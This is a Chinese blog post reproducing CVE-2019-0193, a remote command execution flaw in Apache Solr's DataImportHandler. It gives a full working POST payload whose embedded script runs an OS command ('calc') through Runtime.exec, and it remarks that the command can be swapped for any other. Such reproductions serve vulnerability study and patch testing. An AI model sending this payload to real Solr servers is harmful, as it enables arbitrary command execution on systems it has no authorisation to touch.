CVE-2019-0193:Apache Solr 远程命令执行漏洞复现

感谢指路:https://www.cnblogs.com/paperpen/p/11328728.html
影响范围
Apache Solr < 8.2.0
1.先把下载好的文件解压


2.然后在cmd或powershell中打开,让应用运行起来

3.查看模块名称

4.构造命令执行

# POST内容的主体
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=atom&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
 url="https://stackoverflow.com/feeds/tag/solr"
 processor="XPathEntityProcessor"
 forEach="/feed"
 transformer="script:poc" />
</document>
</dataConfig>

中间遇到一点小问题,entity这个标签中每个属性之间都要有空格,从别人那粘过来的时候没有空格导致报错元素类型 * 必须后跟属性规范 ">" 或 "/>"
5.这样就弹出了计算器,命令执行成功
命令写在POST body中的js脚本中process.exec()方法中可以按需修改


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章